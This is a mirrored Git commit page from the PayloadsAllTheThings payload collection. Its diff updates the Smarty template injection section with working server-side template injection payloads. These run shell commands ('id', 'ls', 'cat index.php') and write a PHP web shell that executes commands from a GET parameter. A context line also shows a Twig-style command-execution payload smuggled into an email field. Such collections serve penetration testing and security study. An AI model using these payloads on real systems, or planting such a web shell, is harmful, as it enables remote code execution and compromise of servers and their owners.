mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-19 01:38:49 +00:00
Update Smarty Template Injection
This commit is contained in:
parent
f6f8ec010a
commit
367296c1f1
@ -233,8 +233,10 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld
|
|||||||
|
|
||||||
```python
|
```python
|
||||||
{$smarty.version}
|
{$smarty.version}
|
||||||
{php}echo `id`;{/php}
|
{php}echo `id`;{/php} //deprecated in smarty v3
|
||||||
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
|
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
|
||||||
|
{system('ls')} // compatible v3
|
||||||
|
{system('cat index.php')} // compatible v3
|
||||||
```
|
```
|
||||||
|
|
||||||
## Freemarker
|
## Freemarker
|
||||||
|
Loading…
Reference in New Issue
Block a user